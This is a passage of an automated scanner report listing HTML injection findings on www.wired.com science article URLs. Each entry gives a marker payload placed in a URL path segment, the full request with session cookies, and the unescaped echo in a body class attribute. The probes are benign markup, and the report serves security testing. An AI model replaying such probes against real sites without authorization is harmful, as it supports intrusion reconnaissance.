Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:43 GMT
Date: Sun, 21 Nov 2010 23:10:43 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese0442"><a>9e37c4acab2 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d13aa"><a>0ad5cf6d60a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsd13aa"><a>0ad5cf6d60a/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:01 GMT
Date: Sun, 21 Nov 2010 23:11:01 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsd13aa"><a>0ad5cf6d60a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9582"><a>bcb764a9769 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencee9582"><a>bcb764a9769/discoveries/news/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:29 GMT
Date: Sun, 21 Nov 2010 23:10:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencee9582"><a>bcb764a9769 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10800"><a>1d3b957fa67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries10800"><a>1d3b957fa67/news/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries10800"><a>1d3b957fa67 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 187f0"><a>98dbdd44018 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news187f0"><a>98dbdd44018/2007/05/dayintech_0528 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:04 GMT
Date: Sun, 21 Nov 2010 23:11:04 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news187f0"><a>98dbdd44018"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49504"><a>10544948792 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science49504"><a>10544948792/discoveries/news/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:07 GMT
Date: Sun, 21 Nov 2010 23:11:07 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science49504"><a>10544948792 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86976"><a>98f964069b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries86976"><a>98f964069b0/news/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries86976"><a>98f964069b0 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5931b"><a>18d340cf7a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news5931b"><a>18d340cf7a3/2007/06/dayintech_0629 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:33 GMT
Date: Sun, 21 Nov 2010 23:11:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news5931b"><a>18d340cf7a3"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf82e"><a>db00fe548f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencecf82e"><a>db00fe548f1/discoveries/news/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:05 GMT
Date: Sun, 21 Nov 2010 23:11:05 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencecf82e"><a>db00fe548f1 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4d3a"><a>ccd81216dac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese4d3a"><a>ccd81216dac/news/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:20 GMT
Date: Sun, 21 Nov 2010 23:11:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese4d3a"><a>ccd81216dac c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f786"><a>0483485da03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news1f786"><a>0483485da03/2007/09/dayintech_0903 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:29 GMT
Date: Sun, 21 Nov 2010 23:11:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news1f786"><a>0483485da03"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ac5"><a>19e070cbea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceb4ac5"><a>19e070cbea0/discoveries/news/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:06 GMT
Date: Sun, 21 Nov 2010 23:11:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceb4ac5"><a>19e070cbea0 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9c23"><a>3309dc6b8b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesa9c23"><a>3309dc6b8b4/news/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:22 GMT
Date: Sun, 21 Nov 2010 23:11:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesa9c23"><a>3309dc6b8b4 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e49"><a>d02b8d3e523 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news78e49"><a>d02b8d3e523/2007/09/dayintech_0904 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:32 GMT
Date: Sun, 21 Nov 2010 23:11:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news78e49"><a>d02b8d3e523"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1916e"><a>0a35d8b532a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science1916e"><a>0a35d8b532a/discoveries/news/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:38 GMT Date: Sun, 21 Nov 2010 23:09:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science1916e"><a>0a35d8b532a ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 884c7"><a>bb42abaa2dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries884c7"><a>bb42abaa2dc/news/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:04 GMT
Date: Sun, 21 Nov 2010 23:10:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries884c7"><a>bb42abaa2dc c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf412"><a>cb3677366bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newscf412"><a>cb3677366bf/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:24 GMT
Date: Sun, 21 Nov 2010 23:10:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newscf412"><a>cb3677366bf">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa58"><a>4fd1e10ab82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science1aa58"><a>4fd1e10ab82/discoveries/news/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:34 GMT
Date: Sun, 21 Nov 2010 23:09:34 GMT
Connection: close

